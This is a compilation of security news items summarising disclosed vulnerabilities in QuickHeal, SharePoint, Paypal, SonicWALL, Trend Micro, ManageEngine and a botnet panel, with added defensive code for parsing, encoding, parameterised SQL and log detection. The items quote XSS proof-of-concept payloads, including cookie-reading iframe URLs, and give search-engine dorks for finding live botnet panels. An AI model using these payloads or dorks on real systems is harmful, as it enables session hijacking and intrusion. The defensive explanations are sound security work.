Local Stack buffer overflow Vulnerability in Quickheal antivirus

A security researcher from Vulnerability Lab has discovered a local stack buffer overflow vulnerability in QuickHeal AntiVirus 7.0.0.1 (b2.0.0.1) Pro.
 
The researcher says that improper buffer handling in the 'pepoly.dll' module leads, under certain conditions, to a stack overflow. Disabling the core scanning server service can trigger the vulnerable code path and crash the system.

"The vulnerability is located in the generated PE file `*.text` value. It can be overflowed by manipulating the import of a malicious PE file. The issue is a classic (uni-code) stack buffer overflow."


A local attacker with low privileges can exploit this vulnerability to take control of the system or simply crash the QuickHeal software process. The security risk of this vulnerability has been estimated as medium.

The researcher also proposed a fix: "It can be patched by a secure filter and size restriction of the PE file name text flag".
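The fix the researcher describes is a size restriction on the section-name field. As an added example (not Quick Heal's code, not the PoC, and not the researcher's patch), the Python parser below reads a PE section table while honouring what the PE/COFF format actually guarantees: IMAGE_SECTION_HEADER.Name is exactly 8 bytes, NUL-padded, with no terminator when all 8 bytes are used, so a copy that scans for a NUL or trusts a length field is exactly where a fixed-size stack buffer overflows. Every offset read from the file is checked against the file length before use, and the section count is capped at the specification's limit. The function names and the constructed sample image are this example's own.

```python
import struct
from typing import List, Optional

SECTION_HEADER_SIZE = 40   # sizeof(IMAGE_SECTION_HEADER)
COFF_HEADER_SIZE = 20      # sizeof(IMAGE_FILE_HEADER)
MAX_SECTIONS = 96          # PE/COFF specification limit on NumberOfSections
NAME_FIELD_LEN = 8         # Name: fixed 8 bytes, NUL-padded, no NUL when 8 chars long


def parse_section_names(pe: bytes) -> List[str]:
    """Return the validated section names of a PE image, or raise ValueError.

    Every offset comes from the file, so every offset is checked against len(pe)
    before it is used; the name is sliced to exactly 8 bytes rather than scanned
    for a terminator that the format does not guarantee."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if e_lfanew + 4 + COFF_HEADER_SIZE > len(pe) or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing or header offset out of bounds")
    coff = e_lfanew + 4
    _machine, nsect, _ts, _symptr, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    if nsect == 0 or nsect > MAX_SECTIONS:
        raise ValueError(f"NumberOfSections {nsect} outside 1..{MAX_SECTIONS}")
    table = coff + COFF_HEADER_SIZE + opt_size
    if table + nsect * SECTION_HEADER_SIZE > len(pe):
        raise ValueError("section table runs past end of file")

    names = []
    for i in range(nsect):
        start = table + i * SECTION_HEADER_SIZE
        raw = pe[start:start + NAME_FIELD_LEN]      # bounded copy: never more than 8 bytes
        name = raw.split(b"\0", 1)[0]                # strip NUL padding if there is any
        # secure filter: printable ASCII only, so the name is safe to log or display
        if not name or any(b < 0x20 or b > 0x7E for b in name):
            raise ValueError(f"section {i}: empty or non-printable name {raw!r}")
        names.append(name.decode("ascii"))
    return names


def rejects(pe: bytes) -> bool:
    """True if the parser refuses the image instead of trusting a bad header."""
    try:
        parse_section_names(pe)
    except ValueError:
        return True
    return False


def build_pe(names: List[bytes], nsect_override: Optional[int] = None) -> bytes:
    """Build a minimal, constructed PE image (DOS stub, PE signature, COFF header,
    zeroed PE32 optional header, section table) for testing; not a loadable binary."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    nsect = len(names) if nsect_override is None else nsect_override
    optional = b"\0" * 224                            # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, nsect, 0, 0, 0, len(optional), 0x0102)
    table = b"".join(n.ljust(NAME_FIELD_LEN, b"\0") + b"\0" * 32 for n in names)
    return bytes(dos) + b"PE\0\0" + coff + optional + table


if __name__ == "__main__":
    # ".rdataXY" fills all 8 bytes, so its Name field carries no terminator at all
    print(parse_section_names(build_pe([b".text", b".rdataXY"])))
    print(rejects(build_pe([b".text"], nsect_override=5000)))
```

The second sample name is the interesting one: a scanner that looks for a NUL would run off the end of the field, whereas slicing eight bytes and stripping padding afterwards cannot.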

The proof of concept is available here.

Microsoft SharePoint vulnerable to Exception Handling Web Vulnerability

The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official Microsoft Sharepoint Online (cloud-based) application.

The vulnerability allows remote attackers to inject their own malicious script code into a vulnerable module on the application side (persistent).

The vulnerability is located in the `Sharepoint Online Cloud 2013 Service` section when processing requests to the `Berechtigungen für den Metadatenspeicher festlegen` (set permissions for the metadata store) module with a manipulated ms-descriptionText > ctl00_PlaceHolderDialogBodySection_PlaceHolderDialogBodyMainSection_ValSummary parameter. The persistent injected script code executes in the main `invalid BDC Übereinstimmung` (invalid BDC match) web application exception handling.

The vulnerability can be exploited with a low (restricted) privileged application user account and low or medium required user interaction. Successful exploitation results in persistent session hijacking, persistent phishing, stable external redirects, stable external malware loads and persistent manipulation of the vulnerable module's context.

The vulnerability has been fixed.

Multiple software vulnerabilities in Trend Micro DirectPass 1.5.0.1060


The Vulnerability Laboratory Research Team discovered multiple software vulnerabilities in the official Trend Micro DirectPass v1.5.0.1060 Software.

Trend Micro™ DirectPass™ manages website passwords and login IDs in one secure location, so you only need to remember one password. Other features include: Keystroke encryption, secure password generation, automatic form-filling, confidential notes, and a secure browser.

The first vulnerability is a local command injection vulnerability that allows local low-privileged system user accounts to inject system-specific commands or local path requests to compromise the software.

The second security flaw discovered by Vulnerability-Lab is a persistent input validation vulnerability that allows local attackers with a low-privileged system user account to inject malicious script code on the application side (persistent) of the software.

The third is a critical pointer vulnerability (DoS) that allows local attackers with a low-privileged system user account to crash the software.

While the local path injection vulnerability has been rated high risk, the other vulnerabilities have been rated medium risk.

After being notified by Vulnerability-Lab researchers, Trend Micro fixed the vulnerabilities on 2013-05-15.

The technical details and proof-of-concept can be found here.

Multiple vulnerabilities in Enterpriser16 LoadBalancer v7.1


Vulnerability-Lab researchers have found multiple persistent input validation web vulnerabilities in the Enterpriser16 v7.1 Load Balancer application.

The first set of vulnerabilities is located in the `Edit Configuration` module, in the bound vulnerable Label, Virtual Host, Request to send, Email Alerts and Response expected parameters.

The second set is located in the Create Solution, Access points and New Contract modules, in the bound vulnerable title, asset name, contract name, name and description parameters.

Exploitation requires low user interaction and a low-privileged application user account. Successful exploitation can lead to persistent session hijacking (manager/admin), persistent phishing or persistent manipulation of the module's web context.

A detailed proof-of-concept can be found here.

Reflected XSS in the Vulnerability-Lab site (vulnerability-lab.com)


The Inj3ct0r team has found a reflected cross-site scripting (XSS) vulnerability in the official website of Vulnerability-Lab.

The Vulnerability Lab subdomain (video.vulnerability-lab.com) that hosts video demos of exploits has been found to be vulnerable to a non-persistent XSS flaw.




The Inj3ct0r team provided us with the PoC for the vulnerability:
173.0.61.44/video/?s="><script>alert("Inj3ct0r Team found Xss on vulnerability-lab")</script>&x=7&y=8
The above code will display a popup with the text "Inj3ct0r Team found Xss on vulnerability-lab". At first the URL confused me, as it points to some other IP.

But I visited the "video.vulnerability-lab.com" website and verified the security flaw by entering the script. It seems the result is being loaded from the above-mentioned IP address.


"We know already about the issue 3 weeks ago," the Vulnerability Lab team responded. "The issue is not exploitable ... it's fake because the issue is located in the website where no login is in use even if it is wordpress."

"The module and the video blog itself was secured ... only the update made the vulnerable module back available."

Persistent Cross Site Scripting Vulnerability in the official Paypal ecommerce


The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the content management system of the official Paypal ecommerce website.

The bug allows remote attackers to inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Artikel pro Seite (items per page) listing module with the bound vulnerable filterVal1 parameter.

Remote exploitation requires low user interaction; local exploitation requires a privileged application user account. Successful exploitation can lead to session hijacking (admin), account theft via a persistent web attack or stable (persistent) context manipulation.


Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers & local privileged user accounts with low required user interaction.
For demonstration or to reproduce ...

Review: [ALL Listing] (index) Rechnungen Verwalten -  Geld Anfordern > Artikel pro Seite (Listing) > filterVal1

var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>


PoC:  "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <

The security risk of the persistent script code injection vulnerability is estimated as medium(+). The vulnerability has been fixed by Paypal.
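The page dump above shows the filterVal1 value being written straight into a `var filterVal1 = "..."` statement, i.e. into a JavaScript string inside an inline script. HTML-escaping is the wrong tool for that context (`&lt;` inside a script block is not decoded by the browser); the value has to be encoded as a JavaScript string literal with `<` and `>` turned into `\u003c`/`\u003e`, so that a `"` cannot end the literal and a `</script>` cannot end the element. The following is an added example written for this article, not Paypal's code; `js_string_literal` and `render_filter_script` are names chosen here, and the injected value is the one reproduced in the listing above.

```python
import json

# Constructed: the filterVal1 value reproduced in the page dump above
INJECTED_FILTER = (
    '<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> '
    '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</script>"> '
    '<script>document.cookie=true;</script>'
)

# Characters that are harmless inside a JS string but meaningful to the HTML parser,
# which sees the <script> element before the JS engine does.
_HTML_SIGNIFICANT = {"<": "\\u003c", ">": "\\u003e", "&": "\\u0026"}


def js_string_literal(value: str) -> str:
    """Encode value as a double-quoted JavaScript string literal that can be
    embedded inside an inline <script> element.

    json.dumps already escapes '"', '\\', control characters and (with
    ensure_ascii) U+2028/U+2029; the extra pass removes the characters that
    would let the HTML parser close the element early."""
    literal = json.dumps(value, ensure_ascii=True)
    for ch, esc in _HTML_SIGNIFICANT.items():
        literal = literal.replace(ch, esc)
    return literal


def render_filter_script(filter_val1: str, adv_filter: str = "email") -> str:
    """The listing page's inline script, with both server-supplied values encoded."""
    return (
        "<script>\n"
        f"var advFilter = {js_string_literal(adv_filter)};\n"
        f"var filterVal1 = {js_string_literal(filter_val1)};\n"
        "</script>"
    )


def script_block_intact(page: str) -> bool:
    """True if the only script delimiters in the output are the real ones, i.e. the
    encoded value could neither end the literal nor end the <script> element."""
    lowered = page.lower()
    return lowered.count("<script") == 1 and lowered.count("</script") == 1


def roundtrips(value: str) -> bool:
    """The literal must still decode to the original value (JSON and JS share
    these escapes), so the filter keeps working for legitimate input."""
    return json.loads(js_string_literal(value)) == value


if __name__ == "__main__":
    print(render_filter_script(INJECTED_FILTER))
```

Because every `<` leaves the output as `\u003c`, the meta refresh and the nested script tags from the dump never reach the HTML parser, while the JS engine still sees the original characters once it evaluates the literal.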

A persistent input validation Vulnerability in the official Paypal Plaza


The Vulnerability Laboratory Research Team discovered a persistent input validation Vulnerability in the official Paypal Plaza website application.

The bug allows a remote attacker to inject malicious script code on the application side (persistent) of the Paypal Plaza eGreetings web service. The vulnerability is located in the eGreeting module notification (Step 5, Preview) with the bound vulnerable 'your name' and 'recipient's name' parameters.

The vulnerability can be exploited by remote attackers with low or medium required user interaction and without a privileged Customer/Pro/Seller account. Successful exploitation can lead to session hijacking (customers), account theft via persistent web attacks, persistent phishing or stable (persistent) manipulation of the mail notification context.

Proof of Concept:
=================

The persistent input validation vulnerability can be exploited by remote attackers with low or medium required user interaction.
For demonstration or to reproduce ...

Review:  Notification Mail - eGreetings Card Notification

<html>
<head>
<title>You have received a eCard from your loved one.</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1"><tr><td><b>Betreff: </b>
You have received a eCard from your loved one.</td></tr><tr><td><b>Von: </b>=?utf-8?B?Ij48aWZyYW1lIHNyYz1hIG9ubG9hZD1hbGVydCgiSEkiKSA8?=
 <admin@vulnerability-lab.com></td></tr><tr><td><b>Datum: </b>14.08.2012 05:15</td></tr></table><table border=0 cellspacing=0
cellpadding=0 width="100%" class="header-part2"><tr><td><b>An: </b>research@vulnerability-lab.com</td></tr></table><br>
Dear "><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") <,<br/><br/>
Greetings! "><"><[PERSISTENT INJECTED SCRIPT CODE OUTSIDE OF GREETINGSCARD ITSELF!]") < has just sent you a eCard.
<br/><br/>
<a href="https://www.paypal-plaza.com/giftcard/2494/lang/en_au">View your eCard now.</a>
</body>
</html>

The security risk of the persistent input validation vulnerability in the mail notification service filter is estimated as medium. The vulnerability has since been fixed by Paypal.

Researchers break into trojan application Backdoor.Win32.VB.oyu

The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.

vOlk-Botnet v4.0 is a remote administration tool whose main function is to manage the HOSTS file of Windows operating systems. The code was created by [byvOlk] in PHP and Visual Basic 6.0.

Vulnerability Details:
1.1
The Vulnerability Laboratory Research Team discovered multiple SQL injection vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.
The SQL vulnerabilities allow remote attackers to inject/execute their own SQL commands/statements on the DBMS of the affected vOlk botnet application control panel.

The vulnerabilities are located in the Messenger, Filezilla and Estadisticas files with the bound vulnerable ?pag listing parameter. The vulnerability can be exploited by remote attackers without user interaction. Successful exploitation of the vulnerabilities results in botnet control panel compromise via remote SQL injection.

Vulnerable File(s):
[+] Messenger.php
[+] Filezilla.php
[+] Estadisticas.php

Vulnerable Parameter(s):
[+] pag
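The `?pag` listing parameter described in 1.1 is a textbook case of an untyped paging value reaching the query text. As an added example (not the panel's code, which the page does not show), the Python/sqlite3 snippet below contrasts the concatenation pattern the advisory describes with the typed, bound version that any listing endpoint should use; the table, rows and function names are constructed for this example.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table: one row per listed entry, grouped by page number."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (id INTEGER PRIMARY KEY, page INTEGER, payload TEXT)")
    conn.executemany(
        "INSERT INTO entries (page, payload) VALUES (?, ?)",
        [(1, "row a"), (1, "row b"), (2, "row c"), (3, "row d")],
    )
    conn.commit()
    return conn


def list_entries_vulnerable(conn: sqlite3.Connection, pag: str) -> List[Tuple[str]]:
    """The pattern the advisory describes: the raw ?pag value pasted into the statement,
    so the value is parsed as SQL rather than as a number."""
    return conn.execute(f"SELECT payload FROM entries WHERE page = {pag}").fetchall()


def list_entries_fixed(conn: sqlite3.Connection, pag: str) -> List[Tuple[str]]:
    """Type the parameter first, then bind it; the value can never become SQL text."""
    try:
        page = int(pag)
    except ValueError:
        raise ValueError("pag must be an integer") from None
    if page < 1:
        raise ValueError("pag must be positive")
    return conn.execute("SELECT payload FROM entries WHERE page = ?", (page,)).fetchall()


def fixed_rejects(conn: sqlite3.Connection, pag: str) -> bool:
    """True if the fixed listing refuses the value instead of querying with it."""
    try:
        list_entries_fixed(conn, pag)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(list_entries_vulnerable(db, "1"))           # the two rows of page 1
    print(list_entries_vulnerable(db, "1 OR 1=1"))    # every row: the WHERE clause was rewritten
    print(list_entries_fixed(db, "1"))                # the two rows of page 1
    print(fixed_rejects(db, "1 OR 1=1"))              # True: never reaches the database
```

The cast does the real work here; the placeholder is what makes the query correct even for columns whose values legitimately contain quotes or keywords.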


1.2
The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the vOlk-Botnet framework application v4.0 private edition.
The input validation vulnerabilities allow remote attackers to inject their own malicious persistent script code on the application side of the botnet framework.
The vulnerabilities are located in the Visit Webpage (Open URL), MSN Stealer, Download File and Setting modules with the bound vulnerable domin, Pasw, https or messenger bot's name parameters. The vulnerability can be exploited by remote attackers with low or medium required user interaction.
Successful exploitation of the vulnerabilities results in botnet control panel compromise via session hijacking, persistent web context manipulation or combined CSRF request manipulation.

Vulnerable Module(s):
[+] MSN Stealer
[+] Visit Webpage (Open URL)
[+] Download File
[+] Setting

Vulnerable Parameter(s):
[+] Name - Bot's Name
[+] URL - Open URL Bots
[+] URL - Download url
[+] Password Administrator & User Administrator


Dork CodeSearch:  <p><font color=``#FFFFFF`` face=``Tahoma`` size=``1``>vOlk-Botnet 4.0</font></p>``   or ``<title>[vOlk-Botnet]v 4.0 Login</title>``
DorK Google:      allinurl:vOlk-Botnet 4.0    or  subtitle:[byvOlk] - WebAdmin Panel ® vOlk-Botnet 4.0    and  allinurl:WebAdmin/archivos/imagen/logo.jpg

Vulnerability-Lab discovered persistent input validation vulnerability in paypal


A security researcher from Vulnerability-Lab has discovered a persistent input validation vulnerability in the content management system of the official Paypal ecommerce website (Customer/Pro/Seller). The bug allows remote attackers to inject malicious script code on the application side (persistent) of the Paypal web service.

The vulnerability is located in the company profile input fields with the bound vulnerable address_id, details (mail) & companyname parameters.

The bug affects the important user profile listing, the address listings & the security notification (mail). The persistent vulnerability is also located in the mail security notification (delete address) module with the bound vulnerable companyname parameter.

The vulnerability can be exploited by remote attackers with low required user interaction and a privileged Customer/Pro/Seller account. Successful exploitation can lead to session hijacking (customers), account theft via a persistent web attack, persistent phishing or stable (persistent) context manipulation in every section/module where the vulnerable companyname value is displayed.

"Restrict the company name input value and parse with an exception handling or secure filter mask. Parse the companyname, addressid & details output of the security mail notification to prevent script code injects/executions," Vulnerability-Lab suggests as a solution for this vulnerability.
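The suggested fix has two halves, restricting the input and encoding the output, and both the company-name case here and the earlier eGreetings 'your name'/'recipient's name' case (where the name reached a mail header as well as the HTML body) need both halves; the SharePoint validation-summary message earlier on this page is the same output-encoding problem. As an added example, not Paypal's code, here is how a profile listing row and a 'delete address' notification mail can be produced so that the name is allowlisted on the way in and HTML-escaped on the way out. The allowlist regex, the length limit and the sample values are assumptions made for this example.

```python
import html
import re
from email.message import EmailMessage

# Allowlist implementing the "restrict the company name input value" half of the
# suggested fix; the 64-character limit and character set are assumptions made here.
COMPANY_NAME_RE = re.compile(r"[A-Za-z0-9 .,&'()\-]{1,64}")

# Constructed test inputs: a legitimate name that still needs escaping, an
# iframe-style payload of the kind quoted in the advisories above, and a
# header-injection attempt aimed at the notification mail.
LEGIT_NAME = "O'Neil & Sons"
TAG_PAYLOAD = '"><iframe src=a onload=alert("VulnerabilityLab") <'
HEADER_PAYLOAD = "Acme\r\nBcc: someone@example.invalid"


def validate_company_name(value: str) -> str:
    """First line of defence: refuse anything outside the allowlist.
    CR/LF are checked explicitly because the name also ends up in mail headers."""
    if "\r" in value or "\n" in value:
        raise ValueError("line breaks in a name would allow mail header injection")
    if not COMPANY_NAME_RE.fullmatch(value):
        raise ValueError("company name outside the allowed character set or length")
    return value


def render_profile_row(address_id: int, company_name: str, details: str) -> str:
    """Profile / address listing row. Every dynamic value is escaped for the HTML
    context it lands in, regardless of what validation ran on the way in."""
    return '<tr data-address-id="{}"><td>{}</td><td>{}</td></tr>'.format(
        int(address_id),                        # integer context: cast, not escape
        html.escape(company_name, quote=True),  # element content
        html.escape(details, quote=True),       # element content
    )


def build_delete_notice(company_name: str, to_addr: str) -> EmailMessage:
    """Security notification mail for 'delete address': the name appears in the
    Subject header (validated plain text) and in the HTML body (escaped)."""
    name = validate_company_name(company_name)
    msg = EmailMessage()
    msg["From"] = "noreply@example.invalid"   # constructed sender
    msg["To"] = to_addr
    msg["Subject"] = f"Address removed for {name}"
    msg.set_content(
        "<html><body><p>The address for <b>{}</b> was deleted.</p></body></html>".format(
            html.escape(name, quote=True)
        ),
        subtype="html",
    )
    return msg


def is_rejected(value: str) -> bool:
    """True if validate_company_name refuses the value."""
    try:
        validate_company_name(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(render_profile_row(7, LEGIT_NAME, "<b>details</b>"))
    print(is_rejected(TAG_PAYLOAD), is_rejected(HEADER_PAYLOAD))
    print(build_delete_notice(LEGIT_NAME, "research@example.invalid")["Subject"])
```

Note that the legitimate name passes validation and still has to be escaped: the apostrophe and ampersand are exactly the characters that break attribute and element contexts, which is why the output side cannot rely on the input side alone.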

A few months after Vulnerability-Lab discovered the security flaw and notified Paypal, Paypal's security team fixed the bug.

The POC details for this vulnerability can be found here.

Researcher discovered multiple vulnerabilities in ManageEngine OpStor


The vulnerability researcher Ibrahim El-Sayed (Mossad) discovered multiple software vulnerabilities in ManageEngine's OpStor Manager.

OpStor is a multi-vendor storage area network (SAN) and network attached storage (NAS) monitoring tool for storage devices such as storage arrays, fabric switches, tape libraries, host servers and host bus adapter cards from vendors including EMC, HP, IBM, Promise, Fibrenetix, Cisco, Brocade, DELL, ADIC, SUN, QLogic, Emulex and JNI.

Ibrahim reports three types of vulnerabilities: a blind SQL injection vulnerability, a persistent script code injection bug and multiple client-side cross-site scripting vulnerabilities.

The first vulnerability allows a remote attacker or a local low-privileged user account to execute SQL commands on the affected application's DBMS. The vulnerability is located in the raidMaps.do file with the bound vulnerable name parameter. Successful exploitation results in DBMS and application compromise.
Exploitation requires no user interaction and no privileged user account.

The second allows remote attackers to inject malicious script code on the application side (persistent). The persistent vulnerability is located in the Alarm reporting module with the bound vulnerable subject parameter. Successful exploitation results in session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction and a privileged user account.

The third vulnerability allows remote attackers to hijack (client-side) website customer, moderator or admin sessions with medium or high required user interaction, or via a local low-privileged user account. The vulnerabilities are located in availability730.do with the bound vulnerable day and name parameters. Successful exploitation can result in account theft, client-side phishing and client-side content request manipulation.

Advisory:
http://www.vulnerability-lab.com/get_content.php?id=667

Multiple Vulnerabilities found in SonicWALL EMail Security 7.3.5

The Vulnerability Laboratory Research Team has discovered multiple web vulnerabilities in SonicWALL's UTM Email Security v7.3.5.6379 & Virtual Appliance.

While most businesses now have some type of anti-spam protection, many must deal with cumbersome management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership. SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL Email Security solutions employ a variety of proven and patented technology designed to block spam and other threats effectively, easily and economically. With innovative protection techniques for both inbound and outbound email plus unique management tools, the Email Security platform delivers superior email protection today—while standing ready to stop the new attacks of tomorrow.

SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization, ease migration and reduce capital costs.


Affected Products:
==================
SonicWall
Product: AntiSpam & EMail Security Appliance Application v7.3.5.6379


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple persistent input validation vulnerabilities have been detected in SonicWALL's UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows a remote attacker or a local low-privileged user account to inject/implement malicious persistent script code on the application side of the email security appliance application.

The vulnerabilities are located in the Compliance & Virus protection procedures module, which loads unsanitized inputs into the output listing of a configuration. Vulnerable values are floodMsgThreshold, zombieNoOfQuarantine, zombieNoOfMessageFromOneUser, safeModeNoOfQuarantine, safeModeNoOfMessageFromOneUser, zombieAllowEmailAddrs & floodMsgThresholdShadow. Successful exploitation results in session hijacking, persistent phishing requests & stable persistent module context manipulation.


Vulnerable Module(s):
[+] Virenschutzverfahren (virus protection procedures)
[-] Ausgehend (Outgoing) - Listing & Exceptions

[+] Compliance Module
[-] Approval Ordner (Approval folder) > Add new Approval Folder


1.2
Multiple client-side cross-site scripting vulnerabilities have been detected in SonicWALL's UTM Email Security v7.3.5.6379 & Virtual Appliance.
The vulnerability allows a remote attacker to manipulate client-side appliance requests with medium required user interaction.
Successful exploitation results in session hijacking, account theft, client-side phishing requests or manipulated context execution on client-side requests. The vulnerabilities are located in the `from` & `row` page listing values. Successful exploitation results in client-side session hijacking, non-persistent phishing requests & non-persistent module context manipulation.


Vulnerable Module(s):
[+] Listing Page (?from & ?row)


Proof of Concept:
=================
1.1
The persistent input validation vulnerabilities can be exploited by remote attackers with low-privileged user accounts.
For demonstration or to reproduce ...

PoC: Ausgehend (Outgoing) - Listing & Exceptions

<input disabled="disabled" id="floodMsgThreshold" name="floodMsgThreshold" value=""
type="hidden"><iframe src="virus_config-Dateien/a.htm" [EXECUTE/INJECT PERSISTENT CODE!]' <"="">
    <input type="hidden" id="floodInterval" name="floodInterval"
value="1"/>

... or

<input type="text"
name="zombieNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfQuarantine">


... or

<input type="text"
name="zombieNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="zombieNoOfMessageFromOneUser">


... or

<input type="text"
name="safeModeNoOfQuarantine" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfQuarantine">

... or

<input type="text"
name="safeModeNoOfMessageFromOneUser" size="3"
value=""><iframe src=a
[EXECUTE/INJECT PERSISTENT CODE!]") <"
id="safeModeNoOfMessageFromOneUser">


URL:    http://esserver.127.0.0.1:8080/virus_config.html




PoC: Compliance Module  -> Approval Ordner - Listing & Exceptions

<tbody><tr><td background="policy_approval_box_summary-Dateien/nav_bar_background.gif" width="24">
<img src="policy_approval_box_summary-Dateien/clear.gif" height="15" width="4"></td><td border="0"
background="policy_approval_box_summary-Dateien/nav_bar_background.gif"><span class="column">Approval-
Ordner</span></td><td border="0" background="policy_approval_box_summary-Dateien/nav_bar_background.gif">
<span class="column">Nachrichten, die eine Genehmigung erfordern</span></td><td background="policy_approval_box_
summary-Dateien/nav_bar_background.gif"> </td></tr><tr>
<td height="12"> </td>
<td><a href="http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]"><iframe src="policy_approval_box_
summary-Dateien/a.htm" [EXECUTION OF PERSISTENT CODE!]" <<="" a=""></td>
<td>0</td>
<td><div
 align="right"><input type="button" name="delete" class="button"
value="Löschen"


URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html



1.2
The client-side cross-site scripting vulnerability can be exploited by remote attackers with medium required user interaction.
For demonstration or to reproduce ...

PoC:

http://esserver.127.0.0.1:8080/alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST REQUEST]row=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
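The three PoC URLs above share a tell that is easy to pick out of access logs: the `from`/`row` paging counters should be plain integers, and the payload is percent-encoded twice (`%253c` decodes to `%3c` and then to `<`), so a detector that decodes only once never sees the tag. As an added example, not SonicWALL's or the researcher's code, the Python below decodes each query value until it stops changing (with a round limit) and flags non-numeric paging values and HTML tags. The log format and the client addresses are constructed for the example; the request URLs are the ones quoted above.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines. The request URLs are the ones quoted in the PoC above;
# the timestamps, client addresses and status codes are made up for this example.
SAMPLE_LOG = """\
2013-06-01T10:00:01Z 10.0.0.5 GET /alert_history.html?from=200 200
2013-06-01T10:00:02Z 10.0.0.9 GET /alert_history.html?from=200<%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c 200
2013-06-01T10:00:03Z 10.0.0.9 GET /policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c 200
2013-06-01T10:00:04Z 10.0.0.7 GET /policy_approval_box.html?pathname=Approval%20Folder 200
"""

# Parameters the appliance treats as paging counters: anything non-numeric is suspect
INTEGER_PARAMS = {"from", "row"}
TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so %253c -> %3c -> <."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(url: str) -> list:
    """Return (param, reasons) for every query parameter that looks hostile."""
    findings = []
    for name, once_decoded in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        value = fully_decode(once_decoded)   # parse_qsl already did round one
        reasons = []
        if name in INTEGER_PARAMS and not value.isdigit():
            reasons.append("non-integer")
        if TAG_RE.search(value):
            reasons.append("html-tag")
        if reasons:
            findings.append((name, reasons))
    return findings


def scan_log(text: str) -> list:
    """Run inspect_request over each log line; returns (client, path, param, reasons)."""
    alerts = []
    for line in text.splitlines():
        _ts, client, _method, url, _status = line.split()
        for param, reasons in inspect_request(url):
            alerts.append((client, urlsplit(url).path, param, reasons))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The type check on `from`/`row` fires even when an encoding trick defeats the tag pattern, which is why both checks are kept: one is tied to what the parameter means, the other to what the payload contains.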


Risk:
=====
1.1
The security risk of the persistent input validation vulnerabilities is estimated as high(-).

1.2
The security risk of the client-side cross-site scripting vulnerabilities is estimated as low(+).

UPDATE: Patch
"Dell SonicWALL E-mail security customers: 7.3.6 patch is now available https://www.mysonicwall.com/Firmware/DownloadCenter.aspx"


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)




Multiple Web Vulnerabilities found in Barracuda EMail Security 2.0.2

